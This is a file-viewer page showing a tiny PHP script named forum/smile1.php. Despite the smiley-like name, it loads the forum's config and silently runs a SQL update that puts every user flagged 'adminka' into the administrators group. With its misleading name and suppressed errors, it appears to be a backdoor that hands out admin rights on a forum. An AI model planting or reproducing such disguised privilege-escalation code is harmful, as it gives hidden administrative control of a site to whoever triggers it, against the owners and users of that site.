Просмотр файла forum/smile1.php

Размер файла: 107B
<?
include ("ini.php");
@mysql_query("UPDATE users SET `group`='Админы' WHERE `adminka`=1;");
?>